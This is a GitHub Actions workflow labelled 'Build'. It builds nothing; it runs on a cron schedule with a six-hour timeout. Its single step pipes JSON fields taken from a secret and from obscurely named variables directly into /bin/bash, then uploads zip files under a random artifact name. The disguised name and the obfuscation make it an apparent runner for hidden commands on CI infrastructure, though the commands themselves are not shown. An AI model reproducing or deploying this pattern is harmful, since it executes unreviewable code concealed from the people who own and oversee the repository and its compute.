name: Build
on:
  workflow_dispatch:

  schedule:
    - cron: '18 2,8,14,20 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  main:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Process
        env:
          ku3: ${{ secrets.ku3 }}
        run: |
          printf '%s' "$ku3" | jq -r .oten923 | /bin/bash
          echo $thhdt3855 | jq -r .hvv0139 | /bin/bash
          printf '%s' "$xa5303" | jq -r .i3423 | /bin/bash

      - name: Archive output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: GzBtatmQ
          path: "*.zip"
          retention-days: 1
